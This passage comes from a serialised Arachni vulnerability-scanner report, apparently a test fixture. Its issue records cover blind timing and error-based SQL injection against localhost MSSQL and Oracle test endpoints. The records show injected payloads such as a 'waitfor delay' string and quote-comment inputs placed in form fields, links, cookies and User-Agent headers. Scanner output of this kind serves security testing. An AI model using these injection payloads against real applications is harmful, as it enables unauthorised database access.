"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/mssql/form/append elem: form method: POST name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ== :skip_orig: true :injected_orig: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ== :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default;waitfor delay '0:0:16'-- :follow_location: true :injected: default;waitfor delay '0:0:16'-- :combo: !binary "aW5wdXQ=": default;waitfor delay '0:0:16'-- :action: http://localhost:12482/mssql/form/append :silent: true :regexp: '' var: input url: http://localhost:12482/mssql/form/append injected: default;waitfor delay '0:0:16'-- id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/mssql/link/straight?input=default elem: link method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ== :skip_orig: true :injected_orig: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ== :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ;waitfor delay '0:0:16'-- :follow_location: true :injected: ;waitfor delay '0:0:16'-- :combo: !binary "aW5wdXQ=": ;waitfor delay '0:0:16'-- :action: http://localhost:12482/mssql/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:12482/mssql/link/straight?input=default injected: ;waitfor delay '0:0:16'-- id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/mssql/link/append?input=default elem: link method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ== :skip_orig: true :injected_orig: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ== :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default;waitfor delay '0:0:16'-- :follow_location: true :injected: default;waitfor delay '0:0:16'-- :combo: !binary "aW5wdXQ=": default;waitfor delay '0:0:16'-- :action: http://localhost:12482/mssql/link/append?input=default :silent: true :regexp: '' var: input url: http://localhost:12482/mssql/link/append?input=default injected: default;waitfor delay '0:0:16'-- id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: true references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: cookie url: http://localhost:12482/mssql/cookie/straight elem: cookie method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: true references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ== :skip_orig: true :injected_orig: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ== :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ;waitfor delay '0:0:16'-- :injected: ;waitfor delay '0:0:16'-- :combo: !binary "Y29va2ll": ;waitfor delay '0:0:16'-- :action: http://localhost:12482/mssql/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:12482/mssql/cookie/straight injected: ;waitfor delay '0:0:16'-- id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=%3Bwaitfor+delay+'0:0:16'--;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: cookie2 url: http://localhost:12482/mssql/cookie/append elem: cookie method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ== :skip_orig: true :injected_orig: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ== :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value;waitfor delay '0:0:16'-- :injected: cookie value;waitfor delay '0:0:16'-- :combo: !binary "Y29va2llMg==": cookie value;waitfor delay '0:0:16'-- :action: http://localhost:12482/mssql/cookie/append :silent: true :regexp: '' var: cookie2 url: http://localhost:12482/mssql/cookie/append injected: cookie value;waitfor delay '0:0:16'-- id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value%3Bwaitfor+delay+'0:0:16'-- response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: User-Agent url: http://localhost:12482/mssql/header/append elem: header method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ== :skip_orig: true :injected_orig: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ== :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user;waitfor delay '0:0:16'-- :injected: arachni_user;waitfor delay '0:0:16'-- :combo: User-Agent: arachni_user;waitfor delay '0:0:16'-- :action: http://localhost:12482/mssql/header/append :silent: true :regexp: '' var: User-Agent url: http://localhost:12482/mssql/header/append injected: arachni_user;waitfor delay '0:0:16'-- id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user;waitfor delay '0:0:16'-- Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: User-Agent url: http://localhost:12482/mssql/header/straight elem: header method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ== :skip_orig: true :injected_orig: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ== :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ;waitfor delay '0:0:16'-- :injected: ;waitfor delay '0:0:16'-- :combo: User-Agent: ;waitfor delay '0:0:16'-- :action: http://localhost:12482/mssql/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:12482/mssql/header/straight injected: ;waitfor delay '0:0:16'-- id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ;waitfor delay '0:0:16'-- Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/oracle/form/flip elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:java\.sql\.SQLException) :match: java.sql.SQLException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: Parameter flip :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/oracle/form/flip :verification: :id: java.sql.SQLException var: Parameter flip url: http://localhost:7362/oracle/form/flip injected: '' id: java.sql.SQLException regexp: (?i-mx:java\.sql\.SQLException) regexp_match: java.sql.SQLException elem: form remarks: {} method: GET response: ! 
'["(PLS|ORA)-[0-9][0-9][0-9][0-9]\njava.sql.SQLException\nOracle error\nOracle stuff Driver\nWarning stuff oci_ stuff\nWarning stuff ora_ stuff\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTUx !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo0OCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/oracle/form/append elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:java\.sql\.SQLException) :match: java.sql.SQLException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/oracle/form/append :verification: :id: java.sql.SQLException var: input url: http://localhost:7362/oracle/form/append injected: default'`-- id: java.sql.SQLException regexp: (?i-mx:java\.sql\.SQLException) regexp_match: java.sql.SQLException elem: form remarks: {} method: GET response: ! 
'(PLS|ORA)-[0-9][0-9][0-9][0-9] java.sql.SQLException Oracle error Oracle stuff Driver Warning stuff oci_ stuff Warning stuff ora_ stuff ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTM2 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo0OCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/oracle/link/flip?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:java\.sql\.SQLException) :match: java.sql.SQLException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: Parameter flip :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/oracle/link/flip?input=default :verification: :id: java.sql.SQLException var: Parameter flip url: http://localhost:7362/oracle/link/flip?input=default injected: '' id: java.sql.SQLException regexp: (?i-mx:java\.sql\.SQLException) regexp_match: java.sql.SQLException elem: link remarks: {} method: GET response: ! 
